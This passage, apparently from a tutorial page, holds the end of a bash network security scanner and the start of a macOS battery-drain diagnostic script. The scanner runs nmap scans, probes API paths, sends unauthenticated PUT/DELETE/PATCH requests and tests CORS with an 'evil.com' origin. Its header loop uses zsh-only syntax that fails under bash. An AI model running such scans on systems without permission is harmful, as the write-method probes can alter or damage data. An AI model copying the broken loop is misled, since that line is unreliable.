    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    else
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    fi
    
    log_success "Asset discovery complete"
}

################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
    log_info "Detecting outdated software versions..."
    log_debug "Creating old_software directory"
    
    mkdir -p old_software
    
    # Parse service versions from port scan
    if [ -f service_versions.txt ]; then
        log_debug "Analyzing service versions for outdated software"
        
        # Check for old Apache versions
        log_debug "Checking for old Apache versions..."
        grep -i "apache" service_versions.txt | grep -E "1\.|2\.0|2\.2" > old_software/apache_old.txt || true
        
        # Check for old OpenSSH versions
        log_debug "Checking for old OpenSSH versions..."
        grep -i "openssh" service_versions.txt | grep -E "[1-6]\." > old_software/openssh_old.txt || true
        
        # Check for old PHP versions
        log_debug "Checking for old PHP versions..."
        grep -i "php" service_versions.txt | grep -E "[1-5]\." > old_software/php_old.txt || true
        
        # Check for old MySQL versions
        log_debug "Checking for old MySQL versions..."
        grep -i "mysql" service_versions.txt | grep -E "[1-4]\." > old_software/mysql_old.txt || true
        
        # Check for old nginx versions
        log_debug "Checking for old nginx versions..."
        grep -i "nginx" service_versions.txt | grep -E "0\.|1\.0|1\.1[0-5]" > old_software/nginx_old.txt || true
    fi
    
    # Check SSL/TLS for old versions
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        log_debug "Outdated TLS protocols detected"
        echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
    fi
    
    # Count old software findings
    OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
    echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
    
    if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
        log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
        log_debug "Outdated software details saved in old_software/ directory"
    else
        log_success "No obviously outdated software detected"
    fi
}

################################################################################
# API Discovery
################################################################################
api_discovery() {
    if [ "$API_SCAN" = false ]; then
        log_info "API scanning disabled"
        log_debug "Skipping API discovery"
        return
    fi
    
    log_info "Discovering APIs..."
    log_debug "Creating api_discovery directory"
    
    mkdir -p api_discovery
    
    # Common API paths
    API_PATHS=(
        "/api"
        "/api/v1"
        "/api/v2"
        "/rest"
        "/graphql"
        "/swagger"
        "/swagger.json"
        "/api-docs"
        "/openapi.json"
        "/.well-known/openapi"
    )
    
    log_debug "Testing ${#API_PATHS[@]} common API endpoints"
    for path in "${API_PATHS[@]}"; do
        log_debug "Testing: $path"
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${path}")
        if [ "$HTTP_CODE" != "404" ]; then
            echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
            log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
            curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
        fi
    done
    
    # Check for API documentation
    log_info "Checking for API documentation..."
    log_debug "Testing for Swagger UI and API docs"
    curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
    curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
    
    log_success "API discovery complete"
}

################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping permission testing"
        return
    fi
    
    log_info "Testing API permissions..."
    log_debug "Creating api_permissions directory"
    
    mkdir -p api_permissions
    
    # Test common API endpoints without authentication
    if [ -f api_discovery/endpoints_found.txt ]; then
        log_debug "Testing discovered API endpoints for authentication issues"
        while IFS= read -r endpoint; do
            API_PATH=$(echo "$endpoint" | cut -d: -f1)
            
            # Test GET without auth
            log_info "Testing $API_PATH without authentication..."
            log_debug "Sending unauthenticated GET request to $API_PATH"
            HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
            echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
            log_debug "Response: HTTP $HTTP_CODE"
            
            # Test common HTTP methods
            log_debug "Testing HTTP methods on $API_PATH"
            for method in GET POST PUT DELETE PATCH; do
                HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
                if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
                    log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
                    echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
                fi
            done
        done < api_discovery/endpoints_found.txt
    fi
    
    # Check for CORS misconfigurations
    log_info "Checking CORS configuration..."
    log_debug "Testing CORS headers with evil.com origin"
    curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
    
    log_success "API permission testing complete"
}

################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
    log_info "Analyzing HTTP security headers..."
    log_debug "Fetching headers from https://${DOMAIN}"
    
    # Get headers from main domain
    curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
    
    # Check for specific security headers
    declare -A HEADERS=(
        ["x-frame-options"]="X-Frame-Options"
        ["x-content-type-options"]="X-Content-Type-Options"
        ["strict-transport-security"]="Strict-Transport-Security"
        ["content-security-policy"]="Content-Security-Policy"
        ["referrer-policy"]="Referrer-Policy"
        ["permissions-policy"]="Permissions-Policy"
        ["x-xss-protection"]="X-XSS-Protection"
    )
    
    log_debug "Checking for security headers"
    > security_headers_status.txt
    for header in "${(k)HEADERS[@]}"; do    # ${(k)...} expands associative-array keys in zsh
        if grep -qi "^${header}:" http_headers.txt; then
            echo "${HEADERS[$header]}: Present" >> security_headers_status.txt
        else
            echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
        fi
    done
    
    log_success "HTTP security headers analysis complete"
}

################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
        log_debug "Subdomain scanning disabled or no subdomains discovered"
        return
    fi
    
    log_info "Scanning discovered subdomains..."
    log_debug "Creating subdomain_scans directory"
    
    mkdir -p subdomain_scans
    
    local count=0
    while IFS= read -r subdomain; do
        count=$((count + 1))
        log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
        log_debug "Testing accessibility of $subdomain"
        
        # Quick check if subdomain is accessible
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
        
        if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
            log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
            
            # Get headers
            log_debug "Fetching headers from $subdomain"
            curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
            
            # Quick port check (top 100 ports)
            log_debug "Scanning top 100 ports on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            else
                nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            fi
            
            # Check for old software
            log_debug "Checking service versions on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            else
                nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            fi
            
            log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
        else
            log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
        fi
    done < subdomains_discovered.txt
    
    log_success "Subdomain scanning complete"
}

################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
    log_info "Generating executive summary..."
    log_debug "Creating executive summary report"
    
    cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report

**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE

---

## Overview

This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.

---

## Key Findings

### 1. Domain Information

- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)

### 2. SSL/TLS Configuration

**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`

**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`

**Assessment:**
EOF

    # Add TLS assessment
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
    else
        echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 3. Port Exposure

- **Open Ports (Top 1000):** $(cat open_ports_count.txt)

**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`

### 4. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
        cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)

**Critical Vulnerabilities:**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`

EOF
    else
        echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 5. Outdated Software

- **Outdated Components Found:** $(cat old_software_count.txt)

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
        find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 6. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        if [ -f api_discovery/endpoints_found.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`

EOF
        fi
        
        if [ -f api_permissions/method_issues.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`

EOF
        fi
    else
        echo "API scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 7. HTTP Security Headers

\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## Priority Recommendations

### Immediate Actions (Priority 1)

EOF

    # Add specific recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
    fi
    
    if grep -q "Missing" security_headers_status.txt; then
        echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
    fi
    
    if [ -f api_permissions/method_issues.txt ]; then
        echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### Review Actions (Priority 2)

1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Regular vulnerability scanning schedule
5. Software update policy and procedures

---

## Next Steps

1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation

---

**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR

**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md

EOF

    log_success "Executive summary generated: $EXEC_REPORT"
    log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}

################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
    log_info "Generating detailed technical report..."
    log_debug "Creating technical report"
    
    cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL

---

## 1. Scope

**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")

---

## 2. DNS Configuration

\`\`\`
$(cat dns_records.txt)
\`\`\`

---

## 3. SSL/TLS Configuration

\`\`\`
$(cat certificate_details.txt)
\`\`\`

---

## 4. Port Scan Results

\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`

---

## 5. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

### 5.2 HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

### 5.3 SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 6. Asset Discovery

### 6.1 Web Technologies

\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`

### 6.2 CMS Detection

\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`

### 6.3 JavaScript Libraries

\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`

### 6.4 Common Files

\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`

---

## 7. Outdated Software

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        for file in old_software/*.txt; do
            if [ -f "$file" ] && [ -s "$file" ]; then
                echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                cat "$file" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                echo >> "$TECH_REPORT"
            fi
        done
    else
        echo "No outdated software detected." >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 8. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

### 8.2 API Permissions

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`

### 8.3 CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 9. HTTP Security Headers

\`\`\`
$(cat http_headers.txt)
\`\`\`

**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## 10. Recommendations

### 10.1 Immediate Actions

EOF

    # Add recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. Update outdated software components" >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

### 10.2 Review Actions

1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Regular security assessments

---

## 11. Document Control

**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)

---

**END OF TECHNICAL REPORT**
EOF

    log_success "Technical report generated: $TECH_REPORT"
    log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}

################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
    if [ "$VULN_SCAN" = false ]; then
        log_debug "Vulnerability scanning disabled, skipping vulnerability report"
        return
    fi
    
    log_info "Generating vulnerability report..."
    log_debug "Creating vulnerability report"
    
    cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION

---

## Executive Summary

**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)

---

## 1. NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

---

## 2. HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

---

## 3. SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

---

## 4. Detailed Findings

\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`

---

**END OF VULNERABILITY REPORT**
EOF

    log_success "Vulnerability report generated: $VULN_REPORT"
    log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}

################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping API report"
        return
    fi
    
    log_info "Generating API security report..."
    log_debug "Creating API security report"
    
    cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION

---

## 1. API Discovery

### 1.1 Endpoints Found

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

---

## 2. Permission Testing

### 2.1 Unauthenticated Access

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`

### 2.2 HTTP Method Issues

\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`

---

## 3. CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS issues found")
\`\`\`

---

**END OF API SECURITY REPORT**
EOF

    log_success "API security report generated: $API_REPORT"
    log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}

################################################################################
# Main Execution
################################################################################
main() {
    echo "========================================"
    echo "Enhanced Security Scanner v${VERSION}"
    echo "========================================"
    echo
    log_debug "Script started at $(date)"
    log_debug "Network interface: $NETWORK_INTERFACE"
    log_debug "Debug mode: $DEBUG"
    echo
    
    # Check dependencies
    check_dependencies
    
    # Initialize scan
    initialize_scan
    
    # Run scans
    log_debug "Starting DNS reconnaissance phase"
    dns_reconnaissance
    
    log_debug "Starting subdomain discovery phase"
    discover_subdomains
    
    log_debug "Starting SSL/TLS analysis phase"
    ssl_tls_analysis
    
    log_debug "Starting port scanning phase"
    port_scanning
    
    if [ "$VULN_SCAN" = true ]; then
        log_debug "Starting vulnerability scanning phase"
        vulnerability_scanning
    fi
    
    log_debug "Starting hping3 testing phase"
    hping3_testing
    
    log_debug "Starting asset discovery phase"
    asset_discovery
    
    log_debug "Starting old software detection phase"
    detect_old_software
    
    if [ "$API_SCAN" = true ]; then
        log_debug "Starting API discovery phase"
        api_discovery
        log_debug "Starting API permission testing phase"
        api_permission_testing
    fi
    
    log_debug "Starting HTTP security headers analysis phase"
    http_security_headers
    
    log_debug "Starting subdomain scanning phase"
    scan_subdomains
    
    # Generate reports
    log_debug "Starting report generation phase"
    generate_executive_summary
    generate_technical_report
    generate_vulnerability_report
    generate_api_report
    
    # Summary
    echo
    echo "========================================"
    log_success "Scan Complete!"
    echo "========================================"
    echo
    log_info "Scan directory: $SCAN_DIR"
    log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
    log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
    
    if [ "$VULN_SCAN" = true ]; then
        log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
    fi
    
    if [ "$API_SCAN" = true ]; then
        log_info "API security report: $SCAN_DIR/$API_REPORT"
    fi
    
    echo
    log_info "Review the reports for detailed findings"
    log_debug "Script completed at $(date)"
}

################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false

while getopts "d:sm:vah" opt; do
    case $opt in
        d)
            DOMAIN="$OPTARG"
            ;;
        s)
            SCAN_SUBDOMAINS=true
            ;;
        m)
            MAX_SUBDOMAINS="$OPTARG"
            ;;
        v)
            VULN_SCAN=true
            ;;
        a)
            API_SCAN=true
            ;;
        h)
            usage
            ;;
        \?)
            log_error "Invalid option: -$OPTARG"
            usage
            ;;
    esac
done

# Validate required arguments
if [ -z "$DOMAIN" ]; then
    log_error "Domain is required"
    usage
fi

# Run main function
main
EOF

chmod +x ./security_scanner_enhanced.sh
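
With the script saved and executable, a typical full run looks like this (the flags map directly to the getopts block above; example.com is a placeholder for a target you are authorised to scan, and root is needed for the nmap and hping3 phases):

sudo ./security_scanner_enhanced.sh -d example.com -s -m 25 -v -a

Here -d sets the target domain, -s enables subdomain scanning, -m caps how many subdomains are processed, -v enables vulnerability scanning, and -a enables API testing.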

MacBook: A script to figure out which processes are causing battery usage/drain issues (even when the laptop lid is closed)

If you're trying to figure out what's draining your MacBook, even when the lid is closed, then try the script below (run it with "sudo ~/battery_drain_analyzer.sh"):

cat > ~/battery_drain_analyzer.sh << 'SCRIPT_EOF'  # unique delimiter: the script's own "EOF" heredocs would otherwise end this one early
#!/bin/bash

# Battery Drain Analyzer for macOS
# This script analyzes processes and settings that affect battery life,
# especially when the laptop lid is closed.

# Colors for terminal output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Output file
REPORT_FILE="battery_drain_report_$(date +%Y%m%d_%H%M%S).md"
TEMP_DIR=$(mktemp -d)

echo -e "${GREEN}Battery Drain Analyzer${NC}"
echo "Collecting system information..."
echo "This may take a minute and will require administrator privileges for some checks."
echo ""

# Function to check if running with sudo
check_sudo() {
    if [[ $EUID -ne 0 ]]; then
        echo -e "${YELLOW}Some metrics require sudo access. Re-running with sudo...${NC}"
        sudo "$0" "$@"
        exit $?
    fi
}

# Elevate up front if needed; the powermetrics capture below requires root
check_sudo "$@"

# Start the report
cat > "$REPORT_FILE" << EOF
# Battery Drain Analysis Report
**Generated:** $(date '+%Y-%m-%d %H:%M:%S %Z')  
**System:** $(sysctl -n hw.model)  
**macOS Version:** $(sw_vers -productVersion)  
**Uptime:** $(uptime | sed 's/.*up //' | sed 's/,.*//')

---

## Executive Summary
This report analyzes processes and settings that consume battery power, particularly when the laptop lid is closed.

EOF

# 1. Check current power assertions
echo "Checking power assertions..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Current Power State

### Active Power Assertions
Power assertions prevent your Mac from sleeping. Here's what's currently active:

\`\`\`
EOF
pmset -g assertions | grep -A 20 "Listed by owning process:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 2. Check sleep prevention
SLEEP_STATUS=$(pmset -g | grep "sleep" | head -1)
if [[ $SLEEP_STATUS == *"sleep prevented"* ]]; then
    echo "" >> "$REPORT_FILE"
    echo "⚠️ **WARNING:** Sleep is currently being prevented!" >> "$REPORT_FILE"
fi

# 3. Analyze power settings
echo "Analyzing power settings..."
cat >> "$REPORT_FILE" << EOF

## ⚙️ Power Management Settings

### Current Power Profile
\`\`\`
EOF
pmset -g >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# Identify problematic settings
cat >> "$REPORT_FILE" << EOF

### Problematic Settings for Battery Life
EOF

POWERNAP=$(pmset -g | grep "powernap" | awk '{print $2}')
TCPKEEPALIVE=$(pmset -g | grep "tcpkeepalive" | awk '{print $2}')
WOMP=$(pmset -g | grep "womp" | awk '{print $2}')
STANDBY=$(pmset -g | grep "standby" | awk '{print $2}')

if [[ "$POWERNAP" == "1" ]]; then
    echo "- ❌ **Power Nap is ENABLED** - Allows Mac to wake for updates (HIGH battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Power Nap is disabled" >> "$REPORT_FILE"
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    echo "- ⚠️ **TCP Keep-Alive is ENABLED** - Maintains network connections during sleep (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ TCP Keep-Alive is disabled" >> "$REPORT_FILE"
fi

if [[ "$WOMP" == "1" ]]; then
    echo "- ⚠️ **Wake on LAN is ENABLED** - Allows network wake (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Wake on LAN is disabled" >> "$REPORT_FILE"
fi

# 4. Collect CPU usage data
echo "Collecting CPU usage data..."
cat >> "$REPORT_FILE" << EOF

## 📊 Top Battery-Draining Processes

### Current CPU Usage (Higher CPU = More Battery Drain)
EOF

# Get top processes by CPU
top -l 2 -n 20 -o cpu -stats pid,command,cpu,mem,purg,user | tail -n 21 > "$TEMP_DIR/top_output.txt"

# Parse and format top output
echo "| PID | Process | CPU % | Memory | User |" >> "$REPORT_FILE"
echo "|-----|---------|-------|--------|------|" >> "$REPORT_FILE"
tail -n 20 "$TEMP_DIR/top_output.txt" | while IFS= read -r line; do
    if [[ ! -z "$line" ]] && [[ "$line" != *"PID"* ]]; then
        PID=$(echo "$line" | awk '{print $1}')
        PROCESS=$(echo "$line" | awk '{print $2}' | cut -c1-30)
        CPU=$(echo "$line" | awk '{print $3}')
        MEM=$(echo "$line" | awk '{print $4}')
        USER=$(echo "$line" | awk '{print $NF}')
        
        # Highlight high CPU processes
        # Use awk for floating point comparison to avoid bc dependency
        if awk "BEGIN {exit !($CPU > 10.0)}" 2>/dev/null; then
            echo "| $PID | **$PROCESS** | **$CPU** | $MEM | $USER |" >> "$REPORT_FILE"
        else
            echo "| $PID | $PROCESS | $CPU | $MEM | $USER |" >> "$REPORT_FILE"
        fi
    fi
done

# 5. Check for power metrics (if available with sudo)
if [[ $EUID -eq 0 ]]; then
    echo "Collecting detailed power metrics..."
    cat >> "$REPORT_FILE" << EOF

### Detailed Power Consumption Analysis
EOF
    
    # Run powermetrics for 2 seconds
    powermetrics --samplers tasks --show-process-energy -i 2000 -n 1 2>/dev/null > "$TEMP_DIR/powermetrics.txt"
    
    if [[ -s "$TEMP_DIR/powermetrics.txt" ]]; then
        echo '```' >> "$REPORT_FILE"
        grep -A 30 -F "*** Running tasks ***" "$TEMP_DIR/powermetrics.txt" | head -35 >> "$REPORT_FILE"
        echo '```' >> "$REPORT_FILE"
    fi
fi

# 6. Check wake reasons
echo "Analyzing wake patterns..."
cat >> "$REPORT_FILE" << EOF

## 💤 Sleep/Wake Analysis

### Recent Wake Events
These events show why your Mac woke from sleep:

\`\`\`
EOF
pmset -g log | grep -E "Wake from|DarkWake|Notification" | tail -10 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 7. Check scheduled wake events
cat >> "$REPORT_FILE" << EOF

### Scheduled Wake Requests
These are processes that have requested to wake your Mac:

\`\`\`
EOF
pmset -g log | grep "Wake Requests" | tail -5 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 8. Background services analysis
echo "Analyzing background services..."
cat >> "$REPORT_FILE" << EOF

## 🔄 Background Services Analysis

### Potentially Problematic Services
EOF

# Check for common battery-draining services
SERVICES_TO_CHECK=(
    "Spotlight:mds_stores"
    "Time Machine:backupd"
    "Photos:photoanalysisd"
    "iCloud:bird"
    "CrowdStrike:falcon"
    "Dropbox:Dropbox"
    "Google Drive:Google Drive"
    "OneDrive:OneDrive"
    "Creative Cloud:Creative Cloud"
    "Docker:com.docker"
    "Parallels:prl_"
    "VMware:vmware"
    "Spotify:Spotify"
    "Slack:Slack"
    "Microsoft Teams:Teams"
    "Zoom:zoom.us"
    "Chrome:Google Chrome"
    "Edge:Microsoft Edge"
)

echo "| Service | Status | Impact |" >> "$REPORT_FILE"
echo "|---------|--------|--------|" >> "$REPORT_FILE"

for service in "${SERVICES_TO_CHECK[@]}"; do
    IFS=':' read -r display_name process_name <<< "$service"
    # Match the process name against the full command line, case-insensitively
    if pgrep -qfi "$process_name" 2>/dev/null; then
        # Get CPU usage for this process (escape special characters)
        escaped_name=$(printf '%s\n' "$process_name" | sed 's/[[\.*^$()+?{|]/\\&/g')
        CPU_USAGE=$(ps aux | grep -i "$escaped_name" | grep -v grep | awk '{sum+=$3} END {print sum}')
